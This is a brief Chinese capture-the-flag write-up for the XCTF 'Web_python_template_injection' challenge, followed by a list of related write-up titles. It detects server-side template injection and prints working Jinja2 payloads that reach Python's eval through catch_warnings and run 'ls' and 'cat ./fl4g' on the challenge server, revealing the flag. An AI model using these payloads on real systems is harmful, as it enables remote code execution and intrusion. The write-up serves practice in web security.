[XCTF]攻防世界Web_python_template_injection模板注入

热度：25 发布时间：2023-11-04 23:11:03.0

模板注入

在url后访问地址/{ {7*7}}
返回49
于是是模板注入

payload：

http://111.200.241.244:52204/{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{
    { c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls').read()") }}{% endif %}{% endfor %}

URL http://111.200.241.244:52204/fl4g index.py not found

http://111.200.241.244:52204/{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{
    { c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat ./fl4g').read()") }}{% endif %}{% endfor %}

URL http://111.200.241.244:52204/ctf{f22b6844-5169-4054-b2a0-d95b9361cb57} not found

查看全文

相关解决方案

xctf（ddctf） Windows_Reverse2 脱壳
【xctf】Reversing-x64Elf-100
【xctf-reverse】六六六
[xctf]favorite_number 命令执行数组key溢出漏洞绕过pregmatch
[xctf]mfw 命令执行php语句执行assert
[xctf]ics-07攻防世界（代码审计 + 正则 + 文件上传）
[xctf]ics-05伪协议读取源码preg_replace() /e漏洞命令执行
[XCTF]攻防世界Web_python_template_injection模板注入
XCTF-elrond32
XCTF-gametime
[XCTF]ics-07
[XCTF 4th-CyberEarth]ics-05
Xctf MISC做题WP
xctf 密码区
XCTF web刷题
XCTF(攻防世界）
XCTF---2ex1
XCTF----babyxor
XCTF 4th-WHCTF-2017
XCTF-高手进阶区：Web_php_include
xctf---easyjava的WriteUp
攻防世界逆向WP，XCTF 3rd-GCTF-2017 hackme
攻防世界WEB---Web_python_template_injection
XCTF 攻防世界Web题目 mfw
XCTF EASYHOOK
XCTF-baby_web
【XCTF 攻防世界】MISC 杂项新手练习区 SimpleRAR
【XCTF 攻防世界】MISC 杂项新手练习区 stegano
pwn-200(xctf)
【XCTF 攻防世界】MISC 杂项新手练习区 base64stego